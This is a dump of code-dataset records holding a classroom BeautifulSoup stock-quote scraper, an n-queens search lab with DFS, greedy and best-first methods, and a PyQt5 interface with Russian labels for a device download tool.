further\nthebodychildren = list(thebody.children)\nprint(len(thebodychildren)) # length of 3 \n# thebodychildren = [ <head> <title> ..., '\\n' , <body> ... ]\n\n# Use list comprehension to see what is in the list\n[type(item) for item in thebodychildren]\n\n#%%\n# STOP\n# Won't work like that except for very simple sites\n# Let's rewind and start from the beginning with soup\n# soup = BeautifulSoup(thispage.content, 'html5lib')\n\n# know what you want to find. 
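(Right-click the price in your browser and choose Inspect; on this page the quote sits in a td with class wsod_last, which is what the code below targets.)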
Use .find() or .find_all()\nfoundlast = soup.find('td', class_='wsod_last')\nprint(foundlast)\nprint(foundlast.text) # almost got it\n\n#%%\n# Try\nprint(list(foundlast.children)) # Here you are, the quote, in the first element of the list\nprint(list(foundlast.children)[0].text) # the stock quote \n\n\n#%%\n# Also try to use CSS selectors\n# Use dot . for className, use # for id\nselectlast = soup.select('tr td.wsod_last span') \nselectlast[0].text\n# Or if we know for sure there is only one, or just want the first one, we can do\n# selectlast = soup.select_one('tr td.wsod_last span') # return a single node instead of a list\n# selectlast.text\n\n\n#%%\n# myportfolio = ( 'MSFT', 'AAPL', 'GOOG' )\n\n# So with all these hard work, we can now streamline all these into a combined function call\nimport requests\nfrom bs4 import BeautifulSoup\ndef getStockQuote(stocksymbol):\n sourcemain = 'https://money.cnn.com/quote/quote.html?symb='\n url = sourcemain + stocksymbol.upper()\n thispage = requests.get(url)\n # soup = BeautifulSoup(thispage.content, 'lxml')\n # soup = BeautifulSoup(thispage.content, 'html.parser')\n soup = BeautifulSoup(thispage.content, 'html5lib')\n selectlast = soup.select_one('tr td.wsod_last span') # return a single node instead of a list\n return float(selectlast.text)\n\n\n#%%\n# Testing...\ngetStockQuote('aapl') # works\ngetStockQuote('silly') # error\n# try to make your codes fool-proof\n\n#%%\nimport requests\nfrom bs4 import BeautifulSoup\n\ndef getStockQuote(stocksymbol):\n sourcemain = 'https://money.cnn.com/quote/quote.html?symb='\n url = sourcemain + stocksymbol.upper()\n thispage = requests.get(url) # thispage.status_code is still 200 whether the stock symbol exists or not. \n # soup = BeautifulSoup(thispage.content, 'lxml')\n # soup = BeautifulSoup(thispage.content, 'html.parser')\n soup = BeautifulSoup(thispage.content, 'html5lib')\n selectlast = soup.select('tr td.wsod_last span') # return a list\n return float(selectlast[0].text) if (len(selectlast)==1) else -1 # or anything that you can flag easily. I try to keep the return value numeric. 
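A plain -1 could collide with a legitimate value in some other context, so pick a sentinel that can never be a real quote.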
Another option would be return np.nan\n\n# Now it works for 'silly'\n\n\n\n# %%\n","repo_name":"Kelv1nYu/Courses_GWU","sub_path":"IntroToDataMining/Classes/Class08_WebScraping/InClass08_WebScraping_changed.py","file_name":"InClass08_WebScraping_changed.py","file_ext":"py","file_size_in_byte":6150,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"17671046705","text":"import numpy\nfrom copy import deepcopy\n\n'''\nThe conditions of this latin square resemble the n queens problem.\n'''\n\n\nclass State:\n def __init__(self, matrix, level):\n self.matrix = matrix\n self.n = len(matrix)\n # This field is meant to help with keeping track of the number of queens that are already placed on the table\n self.level = level\n\n def isValid(self):\n columns = [[] for _ in range(self.n)]\n rows = [[] for _ in range(self.n)]\n forwardDiagonals = [[] for _ in range(self.n * 2 - 1)]\n backwardDiagonals = [[] for _ in range(self.n * 2 - 1)]\n\n for x in range(self.n):\n for y in range(self.n):\n columns[x].append(self.matrix[y][x])\n rows[y].append(self.matrix[y][x])\n forwardDiagonals[x + y].append(self.matrix[y][x])\n backwardDiagonals[x - y + self.n - 1].append(self.matrix[y][x])\n\n # check rows\n for row in rows:\n if numpy.count_nonzero(row) > 1:\n return False\n\n # check columns\n for column in columns:\n if numpy.count_nonzero(column) > 1:\n return False\n\n # check diagonals\n for diagonal in forwardDiagonals:\n if numpy.count_nonzero(diagonal) > 1:\n return False\n\n for diagonal in backwardDiagonals:\n if numpy.count_nonzero(diagonal) > 1:\n return False\n\n return True\n\n def getRemainingValidPositions(self):\n copyMatrix = deepcopy(self.matrix)\n\n for i in range(self.n):\n for j in range(self.n):\n if copyMatrix[i][j] == 1:\n # Marking the line and column\n for k in range(self.n):\n if copyMatrix[k][j] == 0:\n copyMatrix[k][j] = 2\n if copyMatrix[i][k] == 0:\n copyMatrix[i][k] = 2\n\n # Marking the diagonals\n indexSum = i + j\n for i2 in range(self.n):\n j2 = indexSum - i2\n if 0 <= j2 < self.n and copyMatrix[i2][j2] == 0:\n copyMatrix[i2][j2] = 2\n\n indexDiff = i - j\n for i2 in range(self.n):\n j2 = i2 - indexDiff\n if 0 <= j2 < self.n and copyMatrix[i2][j2] == 0:\n copyMatrix[i2][j2] = 2\n\n # Counting unmarked positions\n count = 0\n for line in copyMatrix:\n count += self.n - numpy.count_nonzero(line)\n return count\n\n def generateNextStates(self):\n # The idea here is that each new state is generated by placing each new \"queen\" on every possible position on the next new line, therefore applying some of the problem restrictions directly \"on the go\"\n # Another possibility could have been just adding a new queen on every possible position on the whole table, I guess, and \"ignore\" the restrictions when building the tree, but that seems extremely inefficient\n\n # When we reach a leaf, we stop generating\n if self.level == self.n:\n return\n\n states = []\n for i in range(self.n):\n child = deepcopy(self.matrix)\n child[self.level][i] = 1\n state = State(child, self.level + 1)\n states.append(state)\n\n return states\n\n def printState(self):\n s = \"\"\n for row in self.matrix:\n for piece in row:\n s += str(piece) + \" \"\n s += \"\\n\"\n print(s)\n\n\nclass Problem:\n def __init__(self, state):\n self.initialState = state\n # We don't know how the state we want to reach looks like, so it stays like this for now\n self.finalState = None\n\n @staticmethod\n def expand(state):\n return state.generateNextStates()\n\n def 
heuristic(self, state):\n # An idea here for comparing states would be looking for the number of \"unattacked\" squares for each configuration and see which one provides the most spaces that are not attacked by a queen\n # However, I believe the issue appears in the greedy algorithm, because it seems impossible to pick the best position to put the first queen\n return state.getRemainingValidPositions()\n\n\nclass Controller:\n def __init__(self):\n self.problem = None\n\n def setProblem(self, problem):\n self.problem = problem\n\n def dfs(self):\n path = []\n stack = [self.problem.initialState]\n while len(stack) > 0:\n currentState = stack.pop()\n path.append(currentState)\n\n if currentState.level == currentState.n:\n print(\"PATH:\")\n for elem in path:\n elem.printState()\n print(\"Solution found\")\n return\n\n nextStates = self.problem.expand(currentState)\n validStates = []\n for state in nextStates:\n if state.isValid():\n validStates.append(state)\n\n # For efficiency reasons, I add to the stack only the next states that are valid, instead of checking only the leaves\n for state in reversed(validStates):\n stack.append(state)\n\n print(\"PATH:\")\n for elem in path:\n elem.printState()\n print(\"Solution not found\")\n return\n\n def greedy(self):\n path = []\n stack = [self.problem.initialState]\n while len(stack) > 0:\n currentState = stack.pop()\n path.append(currentState)\n\n if currentState.level == currentState.n:\n print(\"Solution found\")\n print(\"PATH:\")\n for elem in path:\n elem.printState()\n return\n\n nextStates = self.problem.expand(currentState)\n validStates = []\n for state in nextStates:\n if state.isValid():\n validStates.append(state)\n\n if len(validStates) > 0:\n # Here, I look only for the best next state\n bestState = validStates[0]\n bestValue = self.problem.heuristic(bestState)\n for state in validStates:\n currentValue = self.problem.heuristic(state)\n if currentValue > bestValue:\n bestState = state\n bestValue = currentValue\n\n stack.append(bestState)\n print(\"Solution not found\")\n print(\"PATH:\")\n for elem in path:\n elem.printState()\n return\n\n def bestFS(self):\n path = []\n stack = [self.problem.initialState]\n while len(stack) > 0:\n currentState = stack.pop()\n path.append(currentState)\n\n if currentState.level == currentState.n:\n print(\"PATH:\")\n for elem in path:\n elem.printState()\n return\n\n nextStates = self.problem.expand(currentState)\n validStates = []\n for state in nextStates:\n if state.isValid():\n validStates.append(state)\n\n\n validStates.sort(key=lambda x: self.problem.heuristic(x))\n stack += validStates\n\n print(\"PATH:\")\n for elem in path:\n elem.printState()\n return\n\n\nclass UI:\n def __init__(self):\n self.controller = Controller()\n\n def showMenu(self):\n print(\"Choose method\")\n print(\"1. DFS\")\n print(\"2. Greedy\")\n print(\"3. 
BestFS\")\n\n def run(self):\n n = int(input(\"Board size: \"))\n board = [[0 for col in range(n)] for row in range(n)]\n initialState = State(board, 0)\n problem = Problem(initialState)\n self.controller.setProblem(problem)\n self.showMenu()\n\n method = int(input())\n if method == 1:\n self.controller.dfs()\n elif method == 2:\n self.controller.greedy()\n elif method == 3:\n self.controller.bestFS()\n\n\nui = UI()\nui.run()\n","repo_name":"the-coding-cloud/UBB","sub_path":"Year II/Sem II/AI/Lab2_Updated/Lab2.py","file_name":"Lab2.py","file_ext":"py","file_size_in_byte":8222,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"13433532827","text":"from PyQt5 import QtCore, QtGui, QtWidgets\nfrom datetime import datetime\nfrom PyQt5.QtWidgets import QAbstractItemView, QWidget\n\n\nclass Ui_MainWindow(object):\n def setupUi(self, MainWindow):\n MainWindow.setObjectName(\"MainWindow\")\n MainWindow.resize(700, 400)\n MainWindow.setStyleSheet(\"/*\\n\"\n\"ElegantDark Style Sheet for QT Applications\\n\"\n\"Author: Jaime A. Quiroga P.\\n\"\n\"Company: GTRONICK\\n\"\n\"Last updated: 17/04/2018\\n\"\n\"Available at: https://github.com/GTRONICK/QSS/blob/master/ElegantDark.qss\\n\"\n\"*/\\n\"\n\"QMainWindow {\\n\"\n\" background-color:rgb(82, 82, 82);\\n\"\n\"}\\n\"\n\"QTextEdit {\\n\"\n\" background-color:rgb(42, 42, 42);\\n\"\n\" color: rgb(0, 255, 0);\\n\"\n\"}\\n\"\n\"QPushButton{\\n\"\n\" border-style: outset;\\n\"\n\" border-width: 2px;\\n\"\n\" border-top-color: qlineargradient(spread:pad, x1:0.5, y1:0.6, x2:0.5, y2:0.4, stop:0 rgba(115, 115, 115, 255), stop:1 rgba(62, 62, 62, 255));\\n\"\n\" border-right-color: qlineargradient(spread:pad, x1:0.4, y1:0.5, x2:0.6, y2:0.5, stop:0 rgba(115, 115, 115, 255), stop:1 rgba(62, 62, 62, 255));\\n\"\n\" border-left-color: qlineargradient(spread:pad, x1:0.6, y1:0.5, x2:0.4, y2:0.5, stop:0 rgba(115, 115, 115, 255), stop:1 rgba(62, 62, 62, 255));\\n\"\n\" border-bottom-color: rgb(58, 58, 58);\\n\"\n\" border-bottom-width: 1px;\\n\"\n\" border-style: solid;\\n\"\n\" color: rgb(255, 255, 255);\\n\"\n\" padding: 2px;\\n\"\n\" background-color: qlineargradient(spread:pad, x1:0.5, y1:1, x2:0.5, y2:0, stop:0 rgba(77, 77, 77, 255), stop:1 rgba(97, 97, 97, 255));\\n\"\n\"}\\n\"\n\"QPushButton:hover{\\n\"\n\" border-style: outset;\\n\"\n\" border-width: 2px;\\n\"\n\" border-top-color: qlineargradient(spread:pad, x1:0.5, y1:0.6, x2:0.5, y2:0.4, stop:0 rgba(180, 180, 180, 255), stop:1 rgba(110, 110, 110, 255));\\n\"\n\" border-right-color: qlineargradient(spread:pad, x1:0.4, y1:0.5, x2:0.6, y2:0.5, stop:0 rgba(180, 180, 180, 255), stop:1 rgba(110, 110, 110, 255));\\n\"\n\" border-left-color: qlineargradient(spread:pad, x1:0.6, y1:0.5, x2:0.4, y2:0.5, stop:0 rgba(180, 180, 180, 255), stop:1 rgba(110, 110, 110, 255));\\n\"\n\" border-bottom-color: rgb(115, 115, 115);\\n\"\n\" border-bottom-width: 1px;\\n\"\n\" border-style: solid;\\n\"\n\" color: rgb(255, 255, 255);\\n\"\n\" padding: 2px;\\n\"\n\" background-color: qlineargradient(spread:pad, x1:0.5, y1:1, x2:0.5, y2:0, stop:0 rgba(107, 107, 107, 255), stop:1 rgba(157, 157, 157, 255));\\n\"\n\"}\\n\"\n\"QPushButton:pressed{\\n\"\n\" border-style: outset;\\n\"\n\" border-width: 2px;\\n\"\n\" border-top-color: qlineargradient(spread:pad, x1:0.5, y1:0.6, x2:0.5, y2:0.4, stop:0 rgba(62, 62, 62, 255), stop:1 rgba(22, 22, 22, 255));\\n\"\n\" border-right-color: qlineargradient(spread:pad, x1:0.4, y1:0.5, x2:0.6, y2:0.5, stop:0 rgba(115, 115, 115, 255), stop:1 
rgba(62, 62, 62, 255));\\n\"\n\" border-left-color: qlineargradient(spread:pad, x1:0.6, y1:0.5, x2:0.4, y2:0.5, stop:0 rgba(115, 115, 115, 255), stop:1 rgba(62, 62, 62, 255));\\n\"\n\" border-bottom-color: rgb(58, 58, 58);\\n\"\n\" border-bottom-width: 1px;\\n\"\n\" border-style: solid;\\n\"\n\" color: rgb(255, 255, 255);\\n\"\n\" padding: 2px;\\n\"\n\" background-color: qlineargradient(spread:pad, x1:0.5, y1:1, x2:0.5, y2:0, stop:0 rgba(77, 77, 77, 255), stop:1 rgba(97, 97, 97, 255));\\n\"\n\"}\\n\"\n\"QPushButton:disabled{\\n\"\n\" border-style: outset;\\n\"\n\" border-width: 2px;\\n\"\n\" border-top-color: qlineargradient(spread:pad, x1:0.5, y1:0.6, x2:0.5, y2:0.4, stop:0 rgba(115, 115, 115, 255), stop:1 rgba(62, 62, 62, 255));\\n\"\n\" border-right-color: qlineargradient(spread:pad, x1:0.4, y1:0.5, x2:0.6, y2:0.5, stop:0 rgba(115, 115, 115, 255), stop:1 rgba(62, 62, 62, 255));\\n\"\n\" border-left-color: qlineargradient(spread:pad, x1:0.6, y1:0.5, x2:0.4, y2:0.5, stop:0 rgba(115, 115, 115, 255), stop:1 rgba(62, 62, 62, 255));\\n\"\n\" border-bottom-color: rgb(58, 58, 58);\\n\"\n\" border-bottom-width: 1px;\\n\"\n\" border-style: solid;\\n\"\n\" color: rgb(0, 0, 0);\\n\"\n\" padding: 2px;\\n\"\n\" background-color: qlineargradient(spread:pad, x1:0.5, y1:1, x2:0.5, y2:0, stop:0 rgba(57, 57, 57, 255), stop:1 rgba(77, 77, 77, 255));\\n\"\n\"}\\n\"\n\"QLineEdit {\\n\"\n\" border-width: 1px; border-radius: 4px;\\n\"\n\" border-color: rgb(58, 58, 58);\\n\"\n\" border-style: inset;\\n\"\n\" padding: 0 8px;\\n\"\n\" color: rgb(255, 255, 255);\\n\"\n\" background:rgb(100, 100, 100);\\n\"\n\" selection-background-color: rgb(187, 187, 187);\\n\"\n\" selection-color: rgb(60, 63, 65);\\n\"\n\"}\\n\"\n\"QLabel {\\n\"\n\" color:rgb(255,255,255); \\n\"\n\"}\\n\"\n\"QProgressBar {\\n\"\n\" text-align: center;\\n\"\n\" color: rgb(240, 240, 240);\\n\"\n\" border-width: 1px; \\n\"\n\" border-radius: 10px;\\n\"\n\" border-color: rgb(58, 58, 58);\\n\"\n\" border-style: inset;\\n\"\n\" background-color:rgb(77,77,77);\\n\"\n\"}\\n\"\n\"QProgressBar::chunk {\\n\"\n\" background-color: qlineargradient(spread:pad, x1:0.5, y1:0.7, x2:0.5, y2:0.3, stop:0 rgba(87, 97, 106, 255), stop:1 rgba(93, 103, 113, 255));\\n\"\n\" border-radius: 5px;\\n\"\n\"}\\n\"\n\"QMenuBar {\\n\"\n\" background:rgb(82, 82, 82);\\n\"\n\"}\\n\"\n\"QMenuBar::item {\\n\"\n\" color:rgb(223,219,210);\\n\"\n\" spacing: 3px;\\n\"\n\" padding: 1px 4px;\\n\"\n\" background: transparent;\\n\"\n\"}\\n\"\n\"\\n\"\n\"QMenuBar::item:selected {\\n\"\n\" background:rgb(115, 115, 115);\\n\"\n\"}\\n\"\n\"QMenu::item:selected {\\n\"\n\" color:rgb(255,255,255);\\n\"\n\" border-width:2px;\\n\"\n\" border-style:solid;\\n\"\n\" padding-left:18px;\\n\"\n\" padding-right:8px;\\n\"\n\" padding-top:2px;\\n\"\n\" padding-bottom:3px;\\n\"\n\" background:qlineargradient(spread:pad, x1:0.5, y1:0.7, x2:0.5, y2:0.3, stop:0 rgba(87, 97, 106, 255), stop:1 rgba(93, 103, 113, 255));\\n\"\n\" border-top-color: qlineargradient(spread:pad, x1:0.5, y1:0.6, x2:0.5, y2:0.4, stop:0 rgba(115, 115, 115, 255), stop:1 rgba(62, 62, 62, 255));\\n\"\n\" border-right-color: qlineargradient(spread:pad, x1:0.4, y1:0.5, x2:0.6, y2:0.5, stop:0 rgba(115, 115, 115, 255), stop:1 rgba(62, 62, 62, 255));\\n\"\n\" border-left-color: qlineargradient(spread:pad, x1:0.6, y1:0.5, x2:0.4, y2:0.5, stop:0 rgba(115, 115, 115, 255), stop:1 rgba(62, 62, 62, 255));\\n\"\n\" border-bottom-color: rgb(58, 58, 58);\\n\"\n\" border-bottom-width: 1px;\\n\"\n\"}\\n\"\n\"QMenu::item {\\n\"\n\" 
color:rgb(223,219,210);\\n\"\n\" background-color:rgb(78,78,78);\\n\"\n\" padding-left:20px;\\n\"\n\" padding-top:4px;\\n\"\n\" padding-bottom:4px;\\n\"\n\" padding-right:10px;\\n\"\n\"}\\n\"\n\"QMenu{\\n\"\n\" background-color:rgb(78,78,78);\\n\"\n\"}\\n\"\n\"QTabWidget {\\n\"\n\" color:rgb(0,0,0);\\n\"\n\" background-color:rgb(247,246,246);\\n\"\n\"}\\n\"\n\"QTabWidget::pane {\\n\"\n\" border-color: rgb(77,77,77);\\n\"\n\" background-color:rgb(101,101,101);\\n\"\n\" border-style: solid;\\n\"\n\" border-width: 1px;\\n\"\n\" border-radius: 6px;\\n\"\n\"}\\n\"\n\"QTabBar::tab {\\n\"\n\" padding:2px;\\n\"\n\" color:rgb(250,250,250);\\n\"\n\" background-color: qlineargradient(spread:pad, x1:0.5, y1:1, x2:0.5, y2:0, stop:0 rgba(77, 77, 77, 255), stop:1 rgba(97, 97, 97, 255));\\n\"\n\" border-style: solid;\\n\"\n\" border-width: 2px;\\n\"\n\" border-top-right-radius:4px;\\n\"\n\" border-top-left-radius:4px;\\n\"\n\" border-top-color: qlineargradient(spread:pad, x1:0.5, y1:0.6, x2:0.5, y2:0.4, stop:0 rgba(115, 115, 115, 255), stop:1 rgba(95, 92, 93, 255));\\n\"\n\" border-right-color: qlineargradient(spread:pad, x1:0.4, y1:0.5, x2:0.6, y2:0.5, stop:0 rgba(115, 115, 115, 255), stop:1 rgba(95, 92, 93, 255));\\n\"\n\" border-left-color: qlineargradient(spread:pad, x1:0.6, y1:0.5, x2:0.4, y2:0.5, stop:0 rgba(115, 115, 115, 255), stop:1 rgba(95, 92, 93, 255));\\n\"\n\" border-bottom-color: rgb(101,101,101);\\n\"\n\"}\\n\"\n\"QTabBar::tab:selected, QTabBar::tab:last:selected, QTabBar::tab:hover {\\n\"\n\" background-color:rgb(101,101,101);\\n\"\n\" margin-left: 0px;\\n\"\n\" margin-right: 1px;\\n\"\n\"}\\n\"\n\"QTabBar::tab:!selected {\\n\"\n\" margin-top: 1px;\\n\"\n\" margin-right: 1px;\\n\"\n\"}\\n\"\n\"QCheckBox {\\n\"\n\" color:rgb(223,219,210);\\n\"\n\" padding: 2px;\\n\"\n\"}\\n\"\n\"QCheckBox:hover {\\n\"\n\" border-radius:4px;\\n\"\n\" border-style:solid;\\n\"\n\" padding-left: 1px;\\n\"\n\" padding-right: 1px;\\n\"\n\" padding-bottom: 1px;\\n\"\n\" padding-top: 1px;\\n\"\n\" border-width:1px;\\n\"\n\" border-color: rgb(87, 97, 106);\\n\"\n\" background-color:qlineargradient(spread:pad, x1:0.5, y1:0.7, x2:0.5, y2:0.3, stop:0 rgba(87, 97, 106, 150), stop:1 rgba(93, 103, 113, 150));\\n\"\n\"}\\n\"\n\"QCheckBox::indicator:checked {\\n\"\n\" border-radius:4px;\\n\"\n\" border-style:solid;\\n\"\n\" border-width:1px;\\n\"\n\" border-color: rgb(180,180,180);\\n\"\n\" background-color:qlineargradient(spread:pad, x1:0.5, y1:0.7, x2:0.5, y2:0.3, stop:0 rgba(87, 97, 106, 255), stop:1 rgba(93, 103, 113, 255));\\n\"\n\"}\\n\"\n\"QCheckBox::indicator:unchecked {\\n\"\n\" border-radius:4px;\\n\"\n\" border-style:solid;\\n\"\n\" border-width:1px;\\n\"\n\" border-color: rgb(87, 97, 106);\\n\"\n\" background-color:rgb(255,255,255);\\n\"\n\"}\\n\"\n\"QStatusBar {\\n\"\n\" color:rgb(240,240,240);\\n\"\n\"}\")\n self.centralwidget = QtWidgets.QWidget(MainWindow)\n self.centralwidget.setStyleSheet(\"\")\n self.centralwidget.setObjectName(\"centralwidget\")\n self.verticalLayout = QtWidgets.QVBoxLayout(self.centralwidget)\n self.verticalLayout.setObjectName(\"verticalLayout\")\n self.tabWidget = QtWidgets.QTabWidget(self.centralwidget)\n self.tabWidget.setObjectName(\"tabWidget\")\n self.tab_1 = QtWidgets.QWidget()\n self.tab_1.setObjectName(\"tab_1\")\n self.verticalLayout_2 = QtWidgets.QVBoxLayout(self.tab_1)\n self.verticalLayout_2.setObjectName(\"verticalLayout_2\")\n self.tableView = QtWidgets.QTableView(self.tab_1)\n self.tableView.setObjectName(\"tableView\")\n self.tableView.setSelectionBehavior(1)\n 
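# 1 == QAbstractItemView.SelectRows, so clicks select whole rows; the next two calls make the table read-only and hide the row-number header.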
self.tableView.setEditTriggers(QAbstractItemView.NoEditTriggers)\n        self.tableView.verticalHeader().hide()\n        self.verticalLayout_2.addWidget(self.tableView)\n        self.horizontalLayout = QtWidgets.QHBoxLayout()\n        self.horizontalLayout.setObjectName(\"horizontalLayout\")\n        self.label_1 = QtWidgets.QLabel(self.tab_1)\n        self.label_1.setObjectName(\"label_1\")\n        self.horizontalLayout.addWidget(self.label_1)\n        self.dateEdit = QtWidgets.QDateEdit(self.tab_1)\n        self.dateEdit.setDateTime(QtCore.QDateTime(QtCore.QDate(2023, 1, 1), QtCore.QTime(0, 0, 0)))\n        self.dateEdit.setCalendarPopup(True)\n        self.dateEdit.setObjectName(\"dateEdit\")\n        self.dateEdit.setDate(datetime.now()) # set the date to today\n        self.dateEdit.setMaximumDate(datetime.now()) # set the maximum selectable date\n        self.horizontalLayout.addWidget(self.dateEdit)\n        self.pushButton_1 = QtWidgets.QPushButton(self.tab_1)\n        self.pushButton_1.setObjectName(\"pushButton_1\")\n        self.horizontalLayout.addWidget(self.pushButton_1)\n        self.verticalLayout_2.addLayout(self.horizontalLayout)\n        self.label_5 = QtWidgets.QLabel(self.tab_1)\n        self.label_5.setObjectName(\"label_5\")\n        self.verticalLayout_2.addWidget(self.label_5)\n        self.progressBar = QtWidgets.QProgressBar(self.tab_1)\n        self.progressBar.setProperty(\"value\", 0)\n        self.progressBar.setObjectName(\"progressBar\")\n        self.verticalLayout_2.addWidget(self.progressBar)\n        self.tabWidget.addTab(self.tab_1, \"\")\n        self.tab_2 = QtWidgets.QWidget()\n        self.tab_2.setObjectName(\"tab_2\")\n        self.verticalLayout_4 = QtWidgets.QVBoxLayout(self.tab_2)\n        self.verticalLayout_4.setObjectName(\"verticalLayout_4\")\n        self.label_2 = QtWidgets.QLabel(self.tab_2)\n        font = QtGui.QFont()\n        font.setPointSize(12)\n        self.label_2.setFont(font)\n        self.label_2.setObjectName(\"label_2\")\n        self.verticalLayout_4.addWidget(self.label_2)\n        self.gridLayout = QtWidgets.QGridLayout()\n        self.gridLayout.setObjectName(\"gridLayout\")\n        self.label_6 = QtWidgets.QLabel(self.tab_2)\n        self.label_6.setObjectName(\"label_6\")\n        self.gridLayout.addWidget(self.label_6, 0, 0, 1, 1)\n        self.label_7 = QtWidgets.QLabel(self.tab_2)\n        self.label_7.setObjectName(\"label_7\")\n        self.gridLayout.addWidget(self.label_7, 0, 1, 1, 1)\n        self.checkBox_2 = QtWidgets.QCheckBox(self.tab_2)\n        self.checkBox_2.setObjectName(\"checkBox_2\")\n        self.gridLayout.addWidget(self.checkBox_2, 0, 2, 1, 1)\n        self.checkBox_1 = QtWidgets.QCheckBox(self.tab_2)\n        self.checkBox_1.setObjectName(\"checkBox_1\")\n        self.gridLayout.addWidget(self.checkBox_1, 0, 3, 1, 1)\n        self.toolButton = QtWidgets.QPushButton(self.tab_2)\n        self.toolButton.setObjectName(\"toolButton\")\n        self.gridLayout.addWidget(self.toolButton, 0, 4, 1, 1, QtCore.Qt.AlignHCenter)\n        self.pushButton_2 = QtWidgets.QPushButton(self.tab_2)\n        self.pushButton_2.setObjectName(\"pushButton_2\")\n        self.gridLayout.addWidget(self.pushButton_2, 0, 5, 2, 1)\n        self.lineEdit_4 = QtWidgets.QLineEdit(self.tab_2)\n        self.lineEdit_4.setObjectName(\"lineEdit_4\")\n        self.gridLayout.addWidget(self.lineEdit_4, 1, 0, 1, 1)\n        self.lineEdit_3 = QtWidgets.QLineEdit(self.tab_2)\n        self.lineEdit_3.setObjectName(\"lineEdit_3\")\n        self.gridLayout.addWidget(self.lineEdit_3, 1, 1, 1, 1)\n        self.checkBox_4 = QtWidgets.QCheckBox(self.tab_2)\n        self.checkBox_4.setObjectName(\"checkBox_4\")\n        self.gridLayout.addWidget(self.checkBox_4, 1, 2, 1, 1)\n        self.checkBox_3 = QtWidgets.QCheckBox(self.tab_2)\n        self.checkBox_3.setObjectName(\"checkBox_3\")\n        self.gridLayout.addWidget(self.checkBox_3, 1, 3, 1, 1)\n        self.lineEdit_1 = QtWidgets.QLineEdit(self.tab_2)\n        
self.lineEdit_1.setObjectName(\"lineEdit_1\")\n self.gridLayout.addWidget(self.lineEdit_1, 1, 4, 1, 1)\n self.verticalLayout_4.addLayout(self.gridLayout)\n self.label_4 = QtWidgets.QLabel(self.tab_2)\n font = QtGui.QFont()\n font.setPointSize(12)\n self.label_4.setFont(font)\n self.label_4.setObjectName(\"label_4\")\n self.verticalLayout_4.addWidget(self.label_4)\n self.gridLayout_2 = QtWidgets.QGridLayout()\n self.gridLayout_2.setObjectName(\"gridLayout_2\")\n self.tableView_2 = QtWidgets.QTableView(self.tab_2)\n sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Minimum, QtWidgets.QSizePolicy.Expanding)\n sizePolicy.setHorizontalStretch(0)\n sizePolicy.setVerticalStretch(0)\n sizePolicy.setHeightForWidth(self.tableView_2.sizePolicy().hasHeightForWidth())\n self.tableView_2.setSizePolicy(sizePolicy)\n self.tableView_2.setObjectName(\"tableView_2\")\n self.tableView_2.setSelectionBehavior(1)\n self.tableView_2.setEditTriggers(QAbstractItemView.NoEditTriggers)\n self.tableView_2.verticalHeader().hide()\n self.gridLayout_2.addWidget(self.tableView_2, 0, 0, 2, 1)\n self.label_3 = QtWidgets.QLabel(self.tab_2)\n self.label_3.setObjectName(\"label_3\")\n self.gridLayout_2.addWidget(self.label_3, 0, 1, 1, 1, QtCore.Qt.AlignHCenter|QtCore.Qt.AlignBottom)\n self.pushButton_3 = QtWidgets.QPushButton(self.tab_2)\n sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Minimum, QtWidgets.QSizePolicy.Minimum)\n sizePolicy.setHorizontalStretch(0)\n sizePolicy.setVerticalStretch(0)\n sizePolicy.setHeightForWidth(self.pushButton_3.sizePolicy().hasHeightForWidth())\n self.pushButton_3.setSizePolicy(sizePolicy)\n self.pushButton_3.setMaximumSize(QtCore.QSize(80, 30))\n self.pushButton_3.setLayoutDirection(QtCore.Qt.LeftToRight)\n self.pushButton_3.setObjectName(\"pushButton_3\")\n self.gridLayout_2.addWidget(self.pushButton_3, 1, 1, 1, 1)\n self.verticalLayout_4.addLayout(self.gridLayout_2)\n self.tabWidget.addTab(self.tab_2, \"\")\n self.verticalLayout.addWidget(self.tabWidget)\n MainWindow.setCentralWidget(self.centralwidget)\n\n\n self.retranslateUi(MainWindow)\n self.tabWidget.setCurrentIndex(1)\n QtCore.QMetaObject.connectSlotsByName(MainWindow)\n self.new_model = QtGui.QStandardItemModel(parent=self)\n model_header = ['Название', 'IP', 'Путь сохранения', 'Канал 1', 'Канал 2', 'Канал 3', 'Канал 4']\n self.new_model.setHorizontalHeaderLabels(model_header)\n\n def retranslateUi(self, MainWindow):\n _translate = QtCore.QCoreApplication.translate\n MainWindow.setWindowTitle(_translate(\"MainWindow\", \"Cayman\"))\n self.label_1.setText(_translate(\"MainWindow\", \"Название объекта для скачивания\"))\n self.pushButton_1.setText(_translate(\"MainWindow\", \"Скачать\"))\n self.label_5.setText(_translate(\"MainWindow\", \"Статус процесса\"))\n self.tabWidget.setTabText(self.tabWidget.indexOf(self.tab_1), _translate(\"MainWindow\", \"Скачать с Cayman\"))\n self.label_2.setText(_translate(\"MainWindow\", \"Добавить новый Cayman для автоскачивания\"))\n self.label_6.setText(_translate(\"MainWindow\", \"Название\"))\n self.label_7.setText(_translate(\"MainWindow\", \"ip адрес\"))\n self.checkBox_2.setText(_translate(\"MainWindow\", \"Channel1\"))\n self.checkBox_1.setText(_translate(\"MainWindow\", \"Channel2\"))\n self.toolButton.setText(_translate(\"MainWindow\", \"Обзор\"))\n self.pushButton_2.setText(_translate(\"MainWindow\", \"Добавить\"))\n self.checkBox_4.setText(_translate(\"MainWindow\", \"Channel3\"))\n self.checkBox_3.setText(_translate(\"MainWindow\", \"Channel4\"))\n 
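# The three texts set below populate the "remove Cayman from auto-download" block of the second tab.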
